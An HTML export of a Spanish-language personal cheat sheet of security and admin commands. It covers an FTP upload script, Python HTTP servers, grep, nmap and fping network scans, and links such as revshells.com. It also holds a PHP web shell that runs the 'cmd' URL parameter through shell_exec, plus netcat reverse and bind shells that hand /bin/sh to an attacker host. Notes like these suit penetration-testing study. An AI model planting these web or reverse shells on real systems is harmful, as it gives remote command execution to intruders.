<!DOCTYPE html><html><head><meta charset="utf-8"><title>index.html</title><style></style></head><body id="preview">
<h1 class="code-line" data-line-start=0 data-line-end=1><a id="Apuntes_0"></a><strong>Apuntes</strong></h1>
<h4 class="code-line" data-line-start=2 data-line-end=3><a id="FTP_backups_script_2"></a>FTP backups script</h4>
<p class="has-line-data" data-line-start="4" data-line-end="5">Script simple escrito en bash para facilitar la subida de archivos a un servidor ftp.</p>
<pre><code class="has-line-data" data-line-start="7" data-line-end="21">&lt;span class=&quot;hljs-shebang&quot;&gt;#!/bin/bash&lt;/span&gt;
HOST=&lt;span class=&quot;hljs-string&quot;&gt;&quot;www.host.com&quot;&lt;/span&gt;
USER=&lt;span class=&quot;hljs-string&quot;&gt;&quot;user&quot;&lt;/span&gt;
PASSWORD=&lt;span class=&quot;hljs-string&quot;&gt;&quot;p4ssw0rD&quot;&lt;/span&gt;
FILES=$(ls *)

&lt;span class=&quot;hljs-keyword&quot;&gt;for&lt;/span&gt; i &lt;span class=&quot;hljs-keyword&quot;&gt;in&lt;/span&gt; &lt;span class=&quot;hljs-variable&quot;&gt;$FILES&lt;/span&gt;; &lt;span class=&quot;hljs-keyword&quot;&gt;do&lt;/span&gt;
ftp -inv &lt;span class=&quot;hljs-variable&quot;&gt;$HOST&lt;/span&gt; &lt;&lt;EOF
user &lt;span class=&quot;hljs-variable&quot;&gt;$USER&lt;/span&gt; &lt;span class=&quot;hljs-variable&quot;&gt;$PASSWORD&lt;/span&gt;
put &lt;span class=&quot;hljs-variable&quot;&gt;$i&lt;/span&gt;
&lt;span class=&quot;hljs-built_in&quot;&gt;bye&lt;/span&gt;
EOF
&lt;span class=&quot;hljs-keyword&quot;&gt;done&lt;/span&gt;
</code></pre>
<h4 class="code-line" data-line-start=22 data-line-end=23><a id="Python_HTTP_server_22"></a>Python HTTP server</h4>
<p class="has-line-data" data-line-start="24" data-line-end="25">Comando para iniciar un servidor HTTP con python en el puerto que nosotros queramos.</p>
<pre><code class="has-line-data" data-line-start="27" data-line-end="29">python2 -m SimpleHTTPServer &lt;span class=&quot;hljs-number&quot;&gt;8888&lt;/span&gt;        &lt;span class=&quot;hljs-comment&quot;&gt;##### Python2&lt;/span&gt;
</code></pre>
<pre><code class="has-line-data" data-line-start="31" data-line-end="33">python3 -m http.server &lt;span class=&quot;hljs-number&quot;&gt;8888&lt;/span&gt;             &lt;span class=&quot;hljs-comment&quot;&gt;##### Python3&lt;/span&gt;
</code></pre>
<h4 class="code-line" data-line-start=34 data-line-end=35><a id="Buscar_fichero_con_un_string_especfico_34"></a>Buscar fichero con un string específico</h4>
<p class="has-line-data" data-line-start="36" data-line-end="37">Uso del comando grep para encontrar ficheros que contengan un string específico.</p>
<pre><code class="has-line-data" data-line-start="39" data-line-end="41">grep -rni &lt;span class=&quot;hljs-string&quot;&gt;'/directorio/'&lt;/span&gt; &lt;span class=&quot;hljs-operator&quot;&gt;-e&lt;/span&gt; &lt;span class=&quot;hljs-string&quot;&gt;'Texto que queramos buscar'&lt;/span&gt;
</code></pre>
<h4 class="code-line" data-line-start=42 data-line-end=43><a id="Ejecutar_comandos_en_bash_desde_la_url_42"></a>Ejecutar comandos en bash desde la url</h4>
<p class="has-line-data" data-line-start="44" data-line-end="45">Para ello es necesario utilizar un pequeño script en php</p>
<pre><code class="has-line-data" data-line-start="47" data-line-end="55">&lt;span class=&quot;hljs-comment&quot;&gt;## Name: script.php&lt;/span&gt;
&lt;span class=&quot;hljs-preprocessor&quot;&gt;&lt;?php&lt;/span&gt;
    &lt;span class=&quot;hljs-variable&quot;&gt;$command&lt;/span&gt;=&lt;span class=&quot;hljs-variable&quot;&gt;$_GET&lt;/span&gt;[&lt;span class=&quot;hljs-string&quot;&gt;'cmd'&lt;/span&gt;];

    &lt;span class=&quot;hljs-variable&quot;&gt;$output&lt;/span&gt; = shell_exec(&lt;span class=&quot;hljs-variable&quot;&gt;$command&lt;/span&gt;);
    &lt;span class=&quot;hljs-keyword&quot;&gt;echo&lt;/span&gt; &lt;span class=&quot;hljs-string&quot;&gt;&quot;&lt;pre&gt;$output&lt;/pre&gt;&quot;&lt;/span&gt;;
&lt;span class=&quot;hljs-preprocessor&quot;&gt;?&gt;&lt;/span&gt;
</code></pre>
<p class="has-line-data" data-line-start="56" data-line-end="57">Mediante esta url se pueden ejecutar los comandos desde un navegador: <code>http://&lt;ip&gt;/script.php?cmd=&lt;command&gt;</code></p>
<h4 class="code-line" data-line-start=58 data-line-end=59><a id="Netcat_reverse_shell_58"></a>Netcat reverse shell</h4>
<p class="has-line-data" data-line-start="60" data-line-end="61">Atacante:</p>
<pre><code class="has-line-data" data-line-start="63" data-line-end="65">nc &lt;span class=&quot;hljs-operator&quot;&gt;-l&lt;/span&gt; -p &lt;span class=&quot;hljs-number&quot;&gt;8888&lt;/span&gt;
</code></pre>
<p class="has-line-data" data-line-start="66" data-line-end="67">Víctima:</p>
<pre><code class="has-line-data" data-line-start="69" data-line-end="73">RHOST=&lt;span class=&quot;hljs-number&quot;&gt;1.2&lt;/span&gt;.&lt;span class=&quot;hljs-number&quot;&gt;3.4&lt;/span&gt;
RPORT=&lt;span class=&quot;hljs-number&quot;&gt;8888&lt;/span&gt;
nc &lt;span class=&quot;hljs-operator&quot;&gt;-e&lt;/span&gt; /bin/sh &lt;span class=&quot;hljs-variable&quot;&gt;$RHOST&lt;/span&gt; &lt;span class=&quot;hljs-variable&quot;&gt;$RPORT&lt;/span&gt;
</code></pre>
<h4 class="code-line" data-line-start=74 data-line-end=75><a id="Netcat_bind_shell_74"></a>Netcat bind shell</h4>
<p class="has-line-data" data-line-start="76" data-line-end="77">Víctima:</p>
<pre><code class="has-line-data" data-line-start="79" data-line-end="82">LPORT=&lt;span class=&quot;hljs-number&quot;&gt;8888&lt;/span&gt;
nc &lt;span class=&quot;hljs-operator&quot;&gt;-l&lt;/span&gt; -p &lt;span class=&quot;hljs-variable&quot;&gt;$LPORT&lt;/span&gt; &lt;span class=&quot;hljs-operator&quot;&gt;-e&lt;/span&gt; /bin/sh
</code></pre>
<p class="has-line-data" data-line-start="83" data-line-end="84">Atacante:</p>
<pre><code class="has-line-data" data-line-start="86" data-line-end="88">nc &lt;victim_ip&gt; &lt;span class=&quot;hljs-number&quot;&gt;8888&lt;/span&gt;
</code></pre>
<h4 class="code-line" data-line-start=89 data-line-end=90><a id="Fping_a_una_red_89"></a>Fping a una red</h4>
<p class="has-line-data" data-line-start="91" data-line-end="92">Mediante el siguiente comando se pueden obtener rápidamente todos los hosts activos dentro de una red:</p>
<pre><code class="has-line-data" data-line-start="94" data-line-end="96" class="language-sh">fping <span class="hljs-operator">-a</span> -g &lt;<span class="hljs-number">1.2</span>.<span class="hljs-number">3.4</span>/<span class="hljs-number">24</span>&gt; <span class="hljs-number">2</span>&gt;/dev/null 
</code></pre>
<p class="has-line-data" data-line-start="97" data-line-end="98">Se puede obtener el mismo resultado con Nmap</p>
<pre><code class="has-line-data" data-line-start="100" data-line-end="102" class="language-sh">nmap -sn &lt;<span class="hljs-number">1.2</span>.<span class="hljs-number">3.4</span>/<span class="hljs-number">24</span>&gt;
</code></pre>
<h4 class="code-line" data-line-start=103 data-line-end=104><a id="Nmap_103"></a>Nmap</h4>
<p class="has-line-data" data-line-start="104" data-line-end="105">Escaneo rápido que muestra las versiones:</p>
<pre><code class="has-line-data" data-line-start="106" data-line-end="108" class="language-sh">nmap <span class="hljs-operator">-s</span>C <span class="hljs-operator">-s</span>V &lt;<span class="hljs-number">1.2</span>.<span class="hljs-number">3.4</span>/<span class="hljs-number">24</span>&gt;
</code></pre>
<p class="has-line-data" data-line-start="109" data-line-end="110">Detectar el sistema operativo sin hacer ping:</p>
<pre><code class="has-line-data" data-line-start="111" data-line-end="113" class="language-sh">nmap -Pn -O &lt;<span class="hljs-number">1.2</span>.<span class="hljs-number">3.4</span>/<span class="hljs-number">24</span>&gt;
</code></pre>
<p class="has-line-data" data-line-start="114" data-line-end="115">Escaneo UDP:</p>
<pre><code class="has-line-data" data-line-start="116" data-line-end="118" class="language-sh">nmap <span class="hljs-operator">-s</span>U -v &lt;<span class="hljs-number">1.2</span>.<span class="hljs-number">3.4</span>/<span class="hljs-number">24</span>&gt;
</code></pre>
<h4 class="code-line" data-line-start=119 data-line-end=120><a id="Links_de_inters_119"></a>Links de interés</h4>
<p class="has-line-data" data-line-start="121" data-line-end="127"><a href="https://www.revshells.com/">https://www.revshells.com/</a><br>
<a href="https://www.virustotal.com/gui/home/upload">https://www.virustotal.com/gui/home/upload</a><br>
<a href="https://dnsdumpster.com/">https://dnsdumpster.com/</a><br>
<a href="https://temp-mail.org/es/">https://temp-mail.org/es/</a><br>
<a href="https://crt.sh/">https://crt.sh/</a><br>
<a href="https://dillinger.io/">https://dillinger.io/</a></p>
</body></html>
